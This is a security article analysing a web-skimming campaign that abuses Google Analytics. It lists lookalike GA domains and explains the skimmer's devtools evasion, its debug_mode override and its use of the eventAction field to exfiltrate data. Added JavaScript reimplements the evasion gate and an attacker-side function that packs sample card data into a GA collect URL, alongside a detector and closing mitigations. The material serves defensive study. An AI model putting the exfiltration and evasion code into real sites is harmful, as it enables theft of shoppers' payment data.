How to analyze Google Analytics attacks

2025-01-28 Update. From: SLTechnology News&Howtos, Network Security


Shulou (Shulou.com) 05/31 Report

Many newcomers are unclear about how to analyze attacks that abuse Google Analytics, so this article walks through one such campaign in detail: how the skimmer is injected, how it hides from analysts, and how it exfiltrates data through a service that almost every site already trusts.

Web skimming is a common attack that usually targets online shoppers. The principle is simple: the attacker injects malicious code into a compromised site, uses it to collect the data visitors type into forms (typically at checkout), and sends that data to a server under the attacker's control. If the attack succeeds, the attacker obtains the shopper's payment card details.

Attack analysis

Attackers typically register domain names that look like those of popular web services, in particular Google Analytics: google-anatytics[.]com, google-analytcsapi[.]com, google-analytc[.]com, google-anaiytlcs[.]com, google-analytics[.]top, google-analytics[.]cm, google-analytics[.]to, google-analytics-js[.]com, googlc-analytics[.]com. To collect visitor data with Google Analytics, a site owner configures tracking parameters in the analytics.google.com account, obtains a tracking ID (trackingId), and embeds it in the page together with the tracking code. Several tracking codes can be deployed on one site at the same time, each sending visitor data to a different Analytics account. This is what the attack relies on: the skimmer adds a second tracking code that reports to the attacker's own account, so the stolen data flows through the legitimate Google Analytics endpoint.

About 20 infected sites have recently been found worldwide; the victims include stores selling digital equipment, cosmetics, food and spare parts in Europe and in North and South America. The figure at this point in the original article shows the malicious code with the attacker's tracking code and tracking ID.

The attackers try to hide their activity with classic anti-debugging techniques. The figure at this point shows the code that checks whether developer mode (the browser's developer tools) is enabled in the visitor's browser; if it is, the skimmer stays dormant so that an analyst stepping through the page sees nothing.

The attacker nevertheless leaves a way to monitor the script in debug mode. If the browser's local storage (localStorage) contains the value 'debug_mode' == '11', the malicious code executes even with developer mode on, and writes its error messages to the console. The figure at this point shows the debug-mode check together with the RC4 encryption routine used to encrypt the data before it is sent.
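As an added illustration (not code from the page or from the skimmer itself), the following shows how the two gates described above are commonly built: a developer-tools heuristic that silences the script, and the localStorage 'debug_mode' == '11' override that re-enables it for the author. The window and storage objects are passed in explicitly so the logic runs in Node.js. The viewport-gap threshold, the fake window sizes and the storage contents are constructed assumptions, and the page does not show which devtools check the real script uses.

```javascript
// Added illustration: how the two gates described above are commonly built.
// NOT the skimmer's own code; the page does not show which devtools check it uses.

// Heuristic found in many anti-debugging scripts: with DevTools docked, the gap
// between the outer window and the inner viewport grows well past normal chrome.
const DEVTOOLS_GAP_PX = 160; // assumed threshold

function devtoolsLikelyOpen(win) {
  const wGap = win.outerWidth - win.innerWidth;
  const hGap = win.outerHeight - win.innerHeight;
  return wGap > DEVTOOLS_GAP_PX || hGap > DEVTOOLS_GAP_PX;
}

// The override the page describes: localStorage 'debug_mode' == '11' keeps the
// script running under DevTools and turns on error output for its author.
function debugModeEnabled(storage) {
  return storage.getItem('debug_mode') === '11';
}

// Decide whether the payload stage runs and whether it may write to the console.
function gateDecision(win, storage) {
  const debug = debugModeEnabled(storage);
  const devtools = devtoolsLikelyOpen(win);
  return {
    run: debug || !devtools, // dormant for an analyst with DevTools open...
    verbose: debug,          // ...unless the author's own flag is set
  };
}

// Constructed stand-ins for window and localStorage so this runs in Node.js.
function fakeWindow(outerWidth, innerWidth, outerHeight, innerHeight) {
  return { outerWidth, innerWidth, outerHeight, innerHeight };
}
function fakeStorage(entries) {
  const m = new Map(Object.entries(entries));
  return { getItem: (k) => (m.has(k) ? m.get(k) : null) };
}

const normalBrowser = fakeWindow(1280, 1265, 800, 715); // ~85 px of browser chrome
const dockedDevtools = fakeWindow(1280, 860, 800, 715); // 420 px DevTools panel

// Usage: an analyst with DevTools open and no flag sees the skimmer stay dormant;
// setting localStorage.debug_mode = '11' makes it run and log its errors.
const silenced = gateDecision(dockedDevtools, fakeStorage({}));
const authorView = gateDecision(dockedDevtools, fakeStorage({ debug_mode: '11' }));
```

For an analyst the practical takeaway is the reverse of the author's intent: set the debug_mode key to '11' in localStorage before loading the page, and the script will run under the debugger and report its own errors instead of going quiet.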

If the anti-debugging checks pass, the script collects everything entered into the site's input fields, encrypts it, and uses Google Analytics itself to send the collected data, as the figure at this point shows.

The data is sent with the standard Google Analytics send/event call, with the stolen payload placed in the "eventAction" field. The function signature is as follows:

  ga('send', 'event', {
    'eventCategory': 'Category', // Protocol Parameter: ec; Value type: text; Max Length: 150 Bytes
    'eventAction':   'Action',   // Protocol Parameter: ea; Value type: text; Max Length: 500 Bytes
    'eventLabel':    'Label'     // Protocol Parameter: el; Value type: text; Max Length: 500 Bytes
  });

The resulting HTTP request goes to the legitimate collection endpoint, with the packed stolen data in the ea parameter:

  https[:]//www.google-analytics.com/collect?&ea=packed_stolen_data&
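The following is an added example, not code from the page or from the original report, showing the exfiltration path in miniature and one way to detect it from outbound-request logs. It covers three things the text describes: lookalike Google Analytics hostnames, a foreign tracking ID appearing on the site's pages, and stolen data packed into the 500-byte eventAction (ea) parameter of a /collect hit. The real skimmer RC4-encrypts the payload; this example only base64-encodes it, a deliberate substitution to keep it short. The tracking IDs UA-12345-1 and UA-99999-9, the sample form fields, the length and entropy thresholds and the edit-distance threshold are all constructed assumptions.

```javascript
// Added example: exfiltration via the GA "ea" parameter, and a detector for it.
// Not the skimmer's code; base64 stands in for the RC4 encryption the text describes.

const CANONICAL_HOST = 'google-analytics.com';
const OWN_TRACKING_IDS = new Set(['UA-12345-1']); // assumed: the site's legitimate ID

// Attacker side: harvest form fields and pack them into the 500-byte "ea" field.
function packForExfil(fields) {
  return Buffer.from(JSON.stringify(fields), 'utf8').toString('base64');
}

function buildCollectUrl(trackingId, eventAction) {
  const u = new URL('https://www.' + CANONICAL_HOST + '/collect');
  u.searchParams.set('v', '1');
  u.searchParams.set('t', 'event');
  u.searchParams.set('tid', trackingId);
  u.searchParams.set('ec', 'Category');
  u.searchParams.set('ea', eventAction);
  return u.toString();
}

// Defender side, check 1: Levenshtein distance catches typosquats of the GA host.
function editDistance(a, b) {
  const prev = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = prev[0];
    prev[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const tmp = prev[j];
      prev[j] = Math.min(prev[j] + 1, prev[j - 1] + 1, diag + (a[i - 1] === b[j - 1] ? 0 : 1));
      diag = tmp;
    }
  }
  return prev[b.length];
}

function isLookalikeGaHost(hostname) {
  const base = hostname.replace(/^www\./, '');
  if (base === CANONICAL_HOST) return false;
  return editDistance(base, CANONICAL_HOST) <= 2; // assumed threshold
}

// Check 2 helper: Shannon entropy in bits per character; encoded blobs score high.
function entropyBits(s) {
  const counts = new Map();
  for (const ch of s) counts.set(ch, (counts.get(ch) || 0) + 1);
  let h = 0;
  for (const c of counts.values()) {
    const p = c / s.length;
    h -= p * Math.log2(p);
  }
  return h;
}

// Inspect one outbound URL (from a proxy log, HAR file or CSP report).
// Returns the list of reasons it is suspicious; an empty list means clean.
function inspectRequest(urlString, ownIds = OWN_TRACKING_IDS) {
  const reasons = [];
  let u;
  try { u = new URL(urlString); } catch (e) { return ['unparseable URL']; }
  if (isLookalikeGaHost(u.hostname)) reasons.push('lookalike host ' + u.hostname);
  const isGaHit = /(^|\.)google-analytics\.com$/.test(u.hostname) && u.pathname === '/collect';
  if (!isGaHit) return reasons;
  const tid = u.searchParams.get('tid');
  if (tid && !ownIds.has(tid)) reasons.push('foreign tracking ID ' + tid);
  const ea = u.searchParams.get('ea') || '';
  if (ea.length > 100) reasons.push('eventAction is ' + ea.length + ' chars'); // assumed threshold
  if (ea.length >= 32 && entropyBits(ea) > 4.5) reasons.push('eventAction looks encoded');
  return reasons;
}

// Constructed sample traffic: one benign hit and one exfiltration hit.
const benignHit = buildCollectUrl('UA-12345-1', 'add_to_cart');
const stolen = packForExfil({
  name: 'Jane Q. Public', card: '4532015112830366', exp: '09/27', cvv: '123',
  email: 'jane@example.com', addr: '221B Baker St, London',
});
const exfilHit = buildCollectUrl('UA-99999-9', stolen); // UA-99999-9: made-up attacker ID
```

The tracking-ID check is the one that matters most in practice: the hostname, path and request shape of the exfiltration hit are identical to the site's own analytics traffic, so a CSP or proxy that allows google-analytics.com lets it through. Only the tid value, compared against the IDs the site actually owns, separates the two.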

The figure at this point shows one of the obfuscation variants used: a call to a malicious script hosted on firebasestorage.googleapis[.]com, inserted into the infected site.

After deobfuscation, the resulting script is shown in the original article's next figure.

Hazard analysis

Google Analytics is an extremely popular service (according to BuiltWith it is used on about 29 million websites) and it is trusted blindly: administrators add *.google-analytics.com to the Content-Security-Policy header so that the service can collect data. That same allow-list entry lets the attacker exfiltrate data without loading any code from an external source, because the stolen data travels to the legitimate google-analytics.com domain, and a CSP cannot tell the attacker's tracking ID from the site's own.

Precautionary measures

1. Do not install web applications or CMS components from untrusted sources. Keep all software up to date, follow vulnerability announcements for the components you use, and patch promptly.

2. Create strong passwords for all administrative accounts.

3. Grant users the minimum rights they need, and keep track of who has access to the administrative interface.

4. Filter user-supplied data and query parameters to prevent injection of third-party code.

5. E-commerce sites should use PCI DSS-compliant payment gateways.
